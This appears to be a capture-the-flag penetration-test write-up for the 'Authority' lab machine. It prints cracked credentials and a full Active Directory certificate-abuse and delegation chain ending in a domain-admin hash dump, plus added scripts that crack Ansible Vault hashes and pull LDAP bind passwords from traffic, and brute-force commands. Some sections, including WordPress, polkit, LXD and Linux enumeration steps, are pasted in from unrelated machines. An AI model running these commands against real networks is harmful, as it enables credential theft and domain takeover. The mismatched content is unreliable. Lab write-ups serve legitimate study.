HTB_AD_Authority: Penetration Testing Report
| Name | item |
|---|---|
| Platform | OSCP Play Ground |
| Date | 2025-09-15 10:18:54 |
| Author | Blackwin |
| Tools used | nmap; gobuster; burpsuite; wpscan |
| Key words | id_rsa; polkit; LXD |
| Ip address | 10.10.11.222 |
| Flags | local.txt: 53825454332a4b5d2c4b14a7315ec6d4; proof.txt: 9e89507dcfd2001796d15b5eae75a18c |
1. Initial Reconnaissance
Port scanning
- rustscan -a 10.10.11.222 --scripts none --ulimit 5000 | tee scans/rustscan
- sudo nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,8443,9389,47001,49665,49673,49664,49666,49667,49691,49693,49690,49697,49694,49712,61375,61421 10.10.11.222 -oN scans/nmap
- sudo nmap -sCV -p- --open 10.10.11.222 -oN scans/nmap-all
2. Enumeration
FTP Enum
ftp,lftp
SMB Enum
enum4linux
Batch download (mirror the whole share; the -c script must be double-quoted so the lcd path is not broken by nested quotes):
smbclient //10.10.11.222/Development -N -c "prompt OFF;recurse ON;lcd $HOME/Desktop/20250915_HTB_AD_Authority;mget *"
Ansible Vault secrets found in the Development share, converted with ansible2john and cracked with john (john --show form, vault password !@#$%^&*):
$ansible$0*0*15c849c20c74562a25c925c3e5a4abafd392c77635abc2ddc827ba0a1037e9d5*1dff07007e7a25e438e94de3f3e605e1*66cb125164f19fb8ed22809393b1767055a66deae678f4a8b1f8550905f70da5:!@#$%^&*
$ansible$0*0*2fe48d56e7e16f71c18abd22085f39f4fb11a2b9a456cf4b72ec825fc5b9809d*e041732f9243ba0484f582d9cb20e148*4d1741fd34446a95e647c3fb4a4f9e4400eae9dd25d734abba49403c42bc2cd8:!@#$%^&*
$ansible$0*0*c08105402f5db77195a13c1087af3e6fb2bdae60473056b5a477731f51502f93*dfd9eec07341bac0e13c62fe1d0a5f7d*d04b50b49aa665c4db73ad5d8804b4b2511c3b15814ebcf2fe98334284203635:!@#$%^&*
LDAP simple bind captured in cleartext on the wire. The "0Y`T" prefix is the BER framing of the LDAPMessage (0x30 0x59) and BindRequest (0x60 0x54); the bind DN and the password follow as plain octet strings:
CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb  lDaP_1n_th3_cle4r!
Credentials (password as used in the commands that follow): svc_ldap:lDaP_1n_th3_cle4r!
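The three $ansible$ lines are ansible2john output, and a wordlist attack on them is cheap because Ansible Vault's HMAC can be recomputed from a candidate password without decrypting anything. The script below is an added example, not part of the report or of the Ansible/john code bases; it assumes the ansible2john field order salt*ciphertext*HMAC, uses the first hash above as real input and adds a constructed fixture with a made-up password.

```python
#!/usr/bin/env python3
"""Test candidate passwords against ansible2john-style Ansible Vault hashes.

Ansible Vault (format 1.1) derives 80 bytes from the password and a 32-byte salt
with PBKDF2-HMAC-SHA256 (10000 rounds): bytes 0-31 are the AES-256-CTR key,
32-63 the HMAC-SHA256 key, 64-79 the counter IV. The stored HMAC is taken over
the ciphertext with the second key, so a candidate can be accepted or rejected
without decrypting, which is exactly what john and hashcat do.
"""
import hashlib
import hmac

PBKDF2_ROUNDS = 10000
DERIVED_LEN = 80          # 32-byte AES key + 32-byte HMAC key + 16-byte IV
HASH_TAG = "$ansible$"


def parse_ansible2john(line: str):
    """Return (salt, ciphertext, mac) from a '$ansible$0*0*salt*ct*hmac' line.

    Fields are hex in the order ansible2john emits them; a leading 'file:' and a
    trailing ':password' (john --show output) are tolerated and ignored.
    """
    start = line.find(HASH_TAG)
    if start < 0:
        raise ValueError("no $ansible$ tag in line")
    body = line[start + len(HASH_TAG):].split(":", 1)[0]   # hash body contains no ':'
    fields = body.split("*")
    if len(fields) != 5 or fields[0] != "0":
        raise ValueError("unsupported $ansible$ layout")
    return bytes.fromhex(fields[2]), bytes.fromhex(fields[3]), bytes.fromhex(fields[4])


def derive_keys(password: str, salt: bytes):
    """PBKDF2 exactly as ansible-vault does it; returns (aes_key, hmac_key, iv)."""
    d = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS, DERIVED_LEN)
    return d[:32], d[32:64], d[64:80]


def check_candidate(line: str, password: str) -> bool:
    """True if `password` reproduces the stored HMAC over the ciphertext."""
    salt, ciphertext, mac = parse_ansible2john(line)
    _, hmac_key, _ = derive_keys(password, salt)
    return hmac.compare_digest(hmac.new(hmac_key, ciphertext, "sha256").digest(), mac)


def crack(line: str, wordlist):
    """Return the first candidate that verifies, or None."""
    for candidate in wordlist:
        if check_candidate(line, candidate):
            return candidate
    return None


def make_ansible2john_line(password: str, salt: bytes, ciphertext: bytes) -> str:
    """Build the line ansible2john would emit for a vault with this password,
    salt and ciphertext (used only to construct the fixture below)."""
    _, hmac_key, _ = derive_keys(password, salt)
    mac = hmac.new(hmac_key, ciphertext, "sha256").digest()
    return "%s0*0*%s*%s*%s" % (HASH_TAG, salt.hex(), ciphertext.hex(), mac.hex())


# First hash from the Development share as listed in the report (john --show form).
REPORT_LINE = ("$ansible$0*0*15c849c20c74562a25c925c3e5a4abafd392c77635abc2ddc827ba0a1037e9d5"
               "*1dff07007e7a25e438e94de3f3e605e1"
               "*66cb125164f19fb8ed22809393b1767055a66deae678f4a8b1f8550905f70da5:!@#$%^&*")
REPORT_VAULT_PASSWORD = "!@#$%^&*"

# Constructed fixture: fixed salt, arbitrary 16 bytes standing in for the
# ciphertext (only the HMAC is checked, so real AES output is not needed).
FIXTURE_SALT = bytes(range(32))
FIXTURE_CIPHERTEXT = b"\xaa" * 16
FIXTURE_PASSWORD = "Winter2023!"
FIXTURE_LINE = make_ansible2john_line(FIXTURE_PASSWORD, FIXTURE_SALT, FIXTURE_CIPHERTEXT)
WORDLIST = ["password", "Summer2023!", "!@#$%^&*", "Winter2023!"]

if __name__ == "__main__":
    for name, line in (("report", REPORT_LINE), ("fixture", FIXTURE_LINE)):
        print(name, "->", crack(line, WORDLIST))
```

Once a vault password verifies, `ansible-vault decrypt` with that password recovers the plaintext; the check above is the same HMAC comparison john performs per candidate, which is why 10000 PBKDF2 rounds are the only cost per guess.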
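The "0Y`T" prefix on the captured line is the BER framing of that message: 0x30 0x59 opens the LDAPMessage SEQUENCE and 0x60 0x54 the BindRequest, and 0x54 = 84 bytes is exactly the tagged version, the 59-byte DN and the 18-byte password. In a simple bind the password is an unencrypted OCTET STRING right behind the DN, which is why it reads off the wire. The encoder/decoder below is an added example, not code from the report; it follows RFC 4511 framing and reuses the DN and password above as constructed input.

```python
#!/usr/bin/env python3
"""Encode and decode an LDAPv3 simple BindRequest (RFC 4511, BER).

LDAPMessage ::= SEQUENCE {
    messageID  INTEGER,
    protocolOp BindRequest [APPLICATION 0] SEQUENCE {
        version        INTEGER,
        name           OCTET STRING,            -- bind DN
        authentication simple [0] OCTET STRING  -- password, verbatim
    } }
Over plain LDAP (389) nothing here is encrypted: DN and password are readable
by anyone on the path.
"""

TAG_SEQUENCE = 0x30
TAG_INTEGER = 0x02
TAG_OCTET_STRING = 0x04
TAG_BIND_REQUEST = 0x60    # [APPLICATION 0], constructed
TAG_SIMPLE_AUTH = 0x80     # [0] context-specific, primitive
TAG_UNBIND_REQUEST = 0x42  # [APPLICATION 2], primitive, empty


def ber_length(n: int) -> bytes:
    """Definite length: one byte below 128, else 0x80|count followed by count bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, payload: bytes) -> bytes:
    return bytes([tag]) + ber_length(len(payload)) + payload


def ber_int(n: int) -> bytes:
    """Two's-complement INTEGER in the minimal number of bytes."""
    return tlv(TAG_INTEGER, n.to_bytes((n.bit_length() + 8) // 8, "big", signed=True))


def build_simple_bind(msg_id: int, dn: str, password: str) -> bytes:
    op = (ber_int(3)
          + tlv(TAG_OCTET_STRING, dn.encode("utf-8"))
          + tlv(TAG_SIMPLE_AUTH, password.encode("utf-8")))
    return tlv(TAG_SEQUENCE, ber_int(msg_id) + tlv(TAG_BIND_REQUEST, op))


def build_unbind(msg_id: int) -> bytes:
    return tlv(TAG_SEQUENCE, ber_int(msg_id) + bytes([TAG_UNBIND_REQUEST, 0x00]))


def read_tlv(buf: bytes, pos: int):
    """Return (tag, value, position after this element)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                        # long form
        count = length & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    return tag, buf[pos:pos + length], pos + length


def parse_simple_bind(message: bytes):
    """Decode one LDAPMessage; return the bind fields, or None if it is not a simple bind."""
    tag, body, _ = read_tlv(message, 0)
    if tag != TAG_SEQUENCE:
        return None
    tag, msg_id, pos = read_tlv(body, 0)
    tag_op, op, _ = read_tlv(body, pos)
    if tag != TAG_INTEGER or tag_op != TAG_BIND_REQUEST:
        return None
    _, version, pos = read_tlv(op, 0)
    _, name, pos = read_tlv(op, pos)
    tag_auth, auth, _ = read_tlv(op, pos)
    if tag_auth != TAG_SIMPLE_AUTH:           # SASL bind ([3]): no plain password field
        return None
    return {
        "msg_id": int.from_bytes(msg_id, "big", signed=True),
        "version": int.from_bytes(version, "big", signed=True),
        "dn": name.decode("utf-8"),
        "password": auth.decode("utf-8"),
    }


def extract_simple_binds(stream: bytes):
    """Walk a reassembled TCP payload holding consecutive LDAPMessages."""
    found, pos = [], 0
    while pos < len(stream):
        _, _, nxt = read_tlv(stream, pos)
        bind = parse_simple_bind(stream[pos:nxt])
        if bind is not None:
            found.append(bind)
        pos = nxt
    return found


# Bind DN and password as they appear in the captured line of the report (constructed input).
REPORT_DN = "CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb"
REPORT_PASSWORD = "lDaP_1n_th3_cle4r!"

if __name__ == "__main__":
    pkt = build_simple_bind(1, REPORT_DN, REPORT_PASSWORD)
    print(pkt[:2], pkt[5:7])          # b'0Y' b'`T', the framing seen in the capture
    print(extract_simple_binds(pkt + build_unbind(2)))
```

The same parser applied to a pcap's reassembled LDAP stream recovers every simple bind; the only defence is to refuse simple binds on 389 (LDAPS or StartTLS, plus LDAP signing/channel binding on the DC).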
AD CS / delegation chain from svc_ldap to Domain Admin hashes:
- certipy find -u svc_ldap@authority.htb -p 'lDaP_1n_th3_cle4r!' -dc-ip 10.10.11.222 -vulnerable
  (enumerate AD CS; the CorpVPN template is the one requested below with an attacker-chosen UPN, i.e. ESC1)
- addcomputer.py 'authority.htb/svc_ldap' -method LDAPS -computer-name 'EVIL01' -computer-pass 'Str0ng3st_P@ssw0rd!' -dc-ip 10.10.11.222
  (the enrollment is done from a machine account, so create EVIL01$ first; this needs ms-DS-MachineAccountQuota > 0)
- certipy req -username EVIL01$ -password 'Str0ng3st_P@ssw0rd!' -ca AUTHORITY-CA -dc-ip 10.10.11.222 -template CorpVPN -upn administrator@authority.htb -dns authority.htb -debug
  (writes administrator.pfx; split it for passthecert.py: certipy cert -pfx administrator.pfx -nokey -out administrator.crt and certipy cert -pfx administrator.pfx -nocert -out administrator.key)
- python3 ./passthecert.py -dc-ip 10.10.11.222 -crt administrator.crt -key administrator.key -domain authority.htb -port 636 -action write_rbcd -delegate-to 'AUTHORITY$' -delegate-from 'EVIL01$'
  (authenticate to LDAPS with the certificate and set msDS-AllowedToActOnBehalfOfOtherIdentity on AUTHORITY$ so that EVIL01$ may impersonate users to the DC)
- impacket-getST -spn 'cifs/AUTHORITY.authority.htb' -impersonate Administrator 'authority.htb/EVIL01$:Str0ng3st_P@ssw0rd!'
  (S4U2Self + S4U2Proxy; saves a ccache, e.g. Administrator@cifs_AUTHORITY.authority.htb@AUTHORITY.HTB.ccache, the name is printed by getST)
- export KRB5CCNAME=Administrator@cifs_AUTHORITY.authority.htb@AUTHORITY.HTB.ccache
- impacket-secretsdump -k -no-pass authority.htb/Administrator@authority.authority.htb -just-dc-ntlm
  (uses the ticket from KRB5CCNAME; the target host must match the SPN host, AUTHORITY.authority.htb)
Web Enum
directory brute
- ffuf -u http://10.10.11.222/FUZZ -w /usr/share/wordlists/dirb/big.txt
- gobuster dir -u http://10.10.11.222/ -w /usr/share/wordlists/dirb/big.txt
brute force login
- hydra -l loly -P rockyou.txt 10.10.11.222 http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:F=Error" -V -t 5 -w 1 -o results.txt
- wpscan --url http://10.10.11.222/wordpress -U loly -P rockyou.txt
3. Initial Shell
4. Post-Enumeration
get flag: find / -name local.txt 2>/dev/null
get basic info:
- OS version:
- sudo version:
- psexec version:
- users: cat /etc/passwd
- SUID binaries:
- find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
- find / -uid 0 -perm /6000 -type f 2>/dev/null   (SUID or SGID; -perm -6000 would require both bits)
